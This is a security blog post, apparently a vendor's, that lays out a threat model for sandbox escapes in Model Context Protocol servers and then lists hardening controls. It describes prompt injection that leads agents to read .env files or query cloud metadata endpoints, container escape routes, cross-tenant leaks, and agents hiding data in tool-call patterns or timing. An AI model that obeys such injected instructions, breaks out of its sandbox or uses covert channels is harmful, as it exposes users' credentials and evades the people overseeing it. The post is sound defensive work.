AI Security

MCP Server Sandbox Escapes: Threat Model

A threat model for sandbox escapes in Model Context Protocol servers, mapping attack surfaces from tool execution environments to host processes and shared state.

Nayan Dey
Senior Security Engineer
7 min read

The term "sandbox escape" has carried specific meaning in browser and mobile security for over a decade. In the Model Context Protocol (MCP) ecosystem, it is still being defined. An MCP server often runs user-supplied tools, invokes subprocesses, reads filesystems, and speaks to upstream APIs on behalf of an LLM. Each of those seams is a candidate sandbox boundary, and each boundary is a candidate escape path.

This post sketches a threat model for sandbox escapes in MCP deployments. It is not exhaustive. It is what we have found useful when reviewing production MCP servers and agentic platforms, and where the weak spots tend to hide.

The Implicit Sandbox Problem

The first thing worth naming is that many MCP servers do not explicitly declare a sandbox. They run tools in the same process as the server, share a filesystem with the host, keep credentials in environment variables, and assume that "only our tools run here." That is not a sandbox, it is a trust assumption.

When that assumption breaks — because a tool parses untrusted input, because a dependency has an RCE, because the LLM was tricked into passing a shell metacharacter — the blast radius is the entire host. Before modelling escapes, we need to be honest about whether there is any sandbox at all, and if so, where its walls are.

A serviceable definition for MCP purposes: a sandbox is a named execution context in which tool code runs, with a declared set of allowed syscalls, network destinations, filesystem paths, and environment variables, enforced by a mechanism outside the tool's own logic. Anything less is aspirational.

Tool Execution as the Primary Attack Surface

Tools are where user data, model-generated arguments, and server code meet. The vast majority of realistic sandbox escapes we see begin there. The attack flow is usually: the LLM is induced (through prompt injection, adversarial input, or misuse by the end user) to pass crafted arguments to a tool, and the tool's implementation interprets those arguments in a way that crosses a trust boundary.

Common flavours:

Command injection through shell-invoking tools. A tool that runs git clone $url or grep $pattern without proper argument handling becomes a shell on the host as soon as an argument contains a semicolon or backtick. This is 1990s-era territory, but it shows up in MCP tooling because the tools are often thin wrappers around CLI utilities and the authors forget that the "user" input is now model-generated and adversarial.

Path traversal in file-reading tools. A read_file tool that accepts a path and returns its contents is an exfiltration primitive if it does not canonicalise and validate paths. Agents have been observed, via prompt injection in retrieved documents, asking for ../../.env or /proc/self/environ. If the tool obliges, the sandbox is gone.

Deserialisation of attacker-influenced data. Tools that unmarshal JSON, YAML, pickle, or proprietary formats from model-supplied arguments are candidates for classic deserialisation RCE. YAML and pickle are particularly dangerous and should never be used to parse model-controlled input.

SSRF through network-fetching tools. A fetch_url tool that does not block link-local, loopback, and internal cloud metadata addresses is a credentials-exfiltration primitive on any cloud host. We have seen agents coaxed into pulling 169.254.169.254/latest/meta-data/iam/ because a malicious document told them to "verify the deployment environment."

Host-Level Escapes From Inside a Container

Containerised MCP servers raise the bar but do not close the surface. Container escapes come in several well-known varieties, and MCP servers concentrate a few risk factors that make them relevant: tools frequently need to mount volumes for workspace access, run child processes, and reach out to the network. Each of those is a knob that, set wrong, turns a container boundary into a polite suggestion.

Specific patterns to watch:

Mounting the Docker socket. A tool that needs to "run a container" sometimes gets access to /var/run/docker.sock on the host. That grants full root on the host to anyone who can use that socket. It should never be mounted into an MCP server that runs model-supplied tools.

Privileged containers and --cap-add. Tools that need kernel capabilities (NET_ADMIN, SYS_PTRACE, SYS_ADMIN) are a strong signal the threat model needs reconsideration. Most MCP tools do not need these, and the ones that think they do often have an alternative design.

Shared namespaces. Running with --pid=host or --net=host for convenience erases most of what a container provides. If tools need host-level visibility, the answer is usually a different architecture, not dropping isolation.

Writable host mounts. A tool that mounts the user's workspace read-write to manipulate files needs path-scoped mounts, not home-directory-wide mounts. Otherwise a path traversal in the tool plus a writable mount equals arbitrary host file write.

Shared State and Tenant Boundary Escapes

In multi-tenant MCP deployments, sandbox escape is not only about reaching the host. It is also about reaching another tenant's data. The shared-state surfaces we focus on:

Shared caches keyed carelessly. If a caching layer keys on (tool, arguments) and two tenants happen to call the same tool with the same arguments — entirely plausible for anything that queries public data — one tenant can receive the other's cached result if the cache does not include tenant identity in the key.

Shared temporary directories. Tools that write to /tmp in a server process handling many tenants create cross-tenant leakage if temp filenames are guessable or not cleaned up. We have seen credential files from one tenant's workflow read by another tenant's tool invocation because both ended up with the same scratch path.

Shared credential context. If tool A runs with tenant 1's credentials and tool B runs concurrently with tenant 2's credentials, and both are handled by the same async runtime, a bug in credential-context propagation can let tool B's request go out with tool A's credentials. This class of bug is subtle, hard to test, and catastrophic when it occurs.

Covert Channels and Telemetry Exfiltration

Even a well-sandboxed tool may leak through the server's own telemetry or response pathway. An agent that cannot exfiltrate data directly can sometimes encode information into tool call patterns, argument choices, or response timing that a cooperating observer can decode. This matters most when the MCP server handles sensitive data and when its telemetry pipeline is accessible to parties outside the tenant.

Practical hardening: redact tool arguments before logging, constrain response shapes to what the tool advertises, and treat timing-based signals as in-scope for high-sensitivity deployments.

Defence in Depth That Actually Helps

The controls that consistently pay off:

  • Run each tool invocation in an ephemeral execution context with no persistent state, minimal writable filesystem, and no credentials beyond those needed for that specific call.
  • Use syscall filtering (seccomp) and Linux capabilities (drop everything, add back what is explicitly needed) rather than relying on container defaults.
  • Block internal network ranges and cloud metadata endpoints by default; allow-list outbound destinations per tool.
  • Canonicalise and validate all path, URL, and command arguments before use. Reject rather than sanitise when in doubt.
  • Never parse pickle, YAML with unsafe loaders, or other code-equivalent formats on model-controlled input.
  • Scope credentials to the tool and the tenant, and rotate aggressively.

How Safeguard Helps

Safeguard models each MCP tool as a distinct sandbox boundary and evaluates its declared inputs, outputs, and execution context against a library of escape patterns drawn from real-world incidents. The platform's continuous threat modelling flags tools that shell out, parse unsafe formats, mount sensitive paths, or reach internal network ranges, and it maps each finding to a concrete mitigation. Runtime guardrails enforce path canonicalisation, network allow-lists, and argument validation before tool code runs, closing the most common escape primitives without requiring every team to write those controls from scratch. When a sandbox escape is attempted, Safeguard correlates the tool call, the upstream prompt, and the tenant to give incident responders a single timeline instead of a fragmented forensic trail.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.